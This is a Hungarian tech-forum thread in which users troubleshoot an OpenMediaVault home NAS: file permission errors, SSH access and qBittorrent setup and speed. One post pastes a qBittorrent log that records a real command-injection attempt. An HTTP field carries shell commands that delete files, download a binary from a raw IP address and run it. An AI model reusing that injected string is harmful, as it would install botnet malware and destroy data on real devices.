- Sony Xperia 1 VII - Látod-e, esteledik
- Telekom mobilszolgáltatások
- iPhone topik
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
- One mobilszolgáltatások
- Mindenki Z Fold7-et akar
- Huawei Watch GT 5 Pro - egészség + stílus
- Milyen okostelefont vegyek?
- Honor Magic7 Pro - kifinomult, költséges képalkotás
- Samsung Galaxy Z Flip5 - ami kint, az van bent
-
Mobilarena
Új hozzászólás Aktív témák
-
bpmcwap
senior tag
válasz
TheMiller #20617 üzenetére
Igen, google már dobálja magától a lehetőségeket, mert annyit keresek, így belefutottam én is a proxmox-ba...
Elég sokat tud ránézésre, ha én abba belemászok, akkor az év hátralévő részére ki van töltve a szabadidőm...
Mondjuk hosszútávon biztos ez lenne a célszerűbb, de most szeretnék túl lenni ezen rengeteg terrányi dokumentumon meg családi képeken...
(Meg az a 16gb ssd ami benne van most a vasban, valószínüleg kevés lesz...
)
-
válasz
TheMiller #20485 üzenetére
Nem emlékszek korábbi verzióban hogy volt, de a 7-esnél csak "Read/Write" jogot lehet adni a felhasználónak az adott megosztott mappához a sima "Read" és a semmi mellé. Tehát ez alapján nem nagyon lehet mit elrontani. Lehet a HDD-t le kellene formázzam és visszatenni mindent a jelenlegi felhasználóval. Köszönöm azért.
-
válasz
TheMiller #20483 üzenetére
Azokat beállítottam a user groupnak, a root-nak és az user-omv-nek is: Read/Write. Ez kevés volt, ezért akratam ugyan ott a rekurzív beállítást is bekapcsolni, a fenti hibát ott dobta. Tehát látszólag már nem tudom, hogy mit állítsak még be, pedig valami jogosultság probléma lehet csak, nem gondolnám hogy omv 7 bug.
-
válasz
TheMiller #20481 üzenetére
user-omv felhasználóval nem tudok ssh-ra belépni, nem értem miért csak root felhasználóval enged. root felhasználóval belépve ezt a hibát dobja:
chmod: changing permissions of '/srv/dev-disk-by-uuid-2630c593-6acf-4330-b91b-8411e5d3deb8/aquota.user': Operation not permitted
chmod: changing permissions of '/srv/dev-disk-by-uuid-2630c593-6acf-4330-b91b-8411e5d3deb8/aquota.group': Operation not permitted
-
hunaqua
addikt
válasz
TheMiller #20351 üzenetére
Nem merem elkiabálni! Indítottam egy letöltést (35GB) és atom stabilan 110MB/s sebességgel lejött pillanatok alatt.
Ami szerintem változás volt a beállításokban
- fájlok helyének lefoglalása előre: ON
- speciális beállítások fülön a fizikai RAM memória használat: 2048 (több felesleges) -
klrt
tag
válasz
TheMiller #20274 üzenetére
Le állítottam a qbittorentet. a stack-ba létrehozás qbit nevet adtam neki bemásoltam amit írtál, a mappákat átírtam. Így nem engedi létrehozni. Nem aktív a gomb.
BlackJack21
Remélem erre gondolszbool Http::RequestParser::parseRequestLine(const QString&) invalid http header: "time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;"
Http::RequestParser::ParseResult Http::RequestParser::doParse(const QByteArray&) header parsing error
Rossz Http kérés, socket bezárása. IP: ::ffff:217.30.170.214
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:194.48.250.97. Módszer: "CONNECT"
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:194.48.250.97. Módszer: "CONNECT"
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:91.92.252.45. Módszer: "CONNECT"
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:199.45.155.18. Módszer: "PRI"
Catching signal: SIGTERM
Exiting cleanly -
stigma
addikt
válasz
TheMiller #20252 üzenetére
Valami ilyesmit telepítettem az extraból, de mivel kevés időm volt ránézni, restart nem volt ami gondolom kellett volna.
Gondolom ezek után ahogy a dokumentáció írja (Plugins — openmediavault 6.x.y documentation) azt a mappát osszam meg, amelyik a legnagyobb méretű, hogy tudjak törölni belőle.
-
bozsokiandra
tag
Új hozzászólás Aktív témák
Figyelem!
Megjelent a Debian 10-re épülő OMV 5 stabil kiadása.
Új telepítésre ez a verzió ajánlott.
- Adobe Előfizetések - Adobe Creative Cloud All Apps - 12 Hónap
- Windows 10 11 Pro Office 19 21 Pro Plus Retail kulcs 1 PC Mac AKCIÓ! Automatikus 0-24
- Assassin's Creed Shadows Collector's Edition PC
- Eredeti Microsoft termékek - MEGA Akciók! Windows, Office Pro Plus, Project Pro, Visio Pro stb.
- Játékkulcsok olcsón: Steam, Uplay, GoG, Origin, Xbox, PS stb.
- Canon ImagePrograf PRO-6100S Plotter, kevés nyomat, kitűnő állapot
- Gyors, Precíz, Megbízható TELEFONSZERVIZ, amire számíthatsz! Akár 1 órán belül
- Apple iPhone 14Pro 128GB Kártyafüggetlen, 1 év garancia
- Autószimulátor! Leírásokkal, mindenestül, játékkal, kulcsrakészen!
- ÚJ Lenovo LOQ 15IRX9 - QHD 165Hz - i7-13650HX - 16GB - 1TB - RTX 4060 - Win11 - 3 év garancia - HUN
Állásajánlatok
Cég: FOTC
Város: Budapest